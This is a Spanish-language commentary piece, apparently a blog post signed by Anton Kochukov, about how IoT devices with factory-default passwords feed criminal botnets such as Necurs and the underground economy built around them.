Aunque muchos fabricantes han realizado algunos cambios tras este tipo de ataques, la mayoría de los dispositivos IoT todavía vienen con un nombre de usuario y contraseña configurados de fábrica o con vulnerabilidades de seguridad conocidas. Además, para ahorrar tiempo y dinero, algunos fabricantes duplican periódicamente el hardware y el software utilizados para diferentes clases de dispositivos. Como resultado, las contraseñas predeterminadas utilizadas para controlar el dispositivo original se pueden aplicar a muchos dispositivos completamente diferentes. Por lo tanto, ya se han desplegado miles de millones de dispositivos IoT no seguros. Y, aunque el crecimiento proyectado en su número se ha desacelerado (aunque ligeramente), el aumento esperado en la flota global de dispositivos IoT “potencialmente peligrosos” en el futuro previsible es impactante (ver gráfico a continuación).
Muchos dispositivos de IoT son adecuados para su uso no autorizado en botnets criminales porque:
He aquí otro ejemplo reciente que le ayudará a comprender el poder que pueden tener las modernas infraestructuras de botnet criminales: en noviembre de 2017, la botnet Necurs distribuyó una nueva cepa del virus ransomware Scarab. Como resultado, se enviaron alrededor de 12,5 millones de correos electrónicos infectados a la campaña masiva, es decir, la tasa de distribución fue de más de 2 millones de correos electrónicos por hora. Por cierto, se vio que la misma botnet distribuía los troyanos bancarios Dridex y Trickbot, así como los virus ransomware Locky y Jans.
El entorno favorable para los ciberdelincuentes en los últimos años debido a la alta disponibilidad y facilidad de uso de malware botnet más sofisticado y flexible, junto con el aumento significativo en el número de dispositivos IoT desprotegidos, ha convertido a los botnets criminales en un componente importante del creciente clandestinidad digital. economía. Esta economía tiene mercados para vender datos obtenidos ilegalmente, llevar a cabo acciones maliciosas contra objetivos específicos en la prestación de servicios por contrato, e incluso por su propia moneda. Y todos los pronósticos de los analistas y especialistas en seguridad suenan extremadamente decepcionantes: en el futuro previsible, la situación con el uso indebido de botnets para obtener ganancias ilegales no hará más que empeorar.
Eterno paranoico, Anton Kochukov.
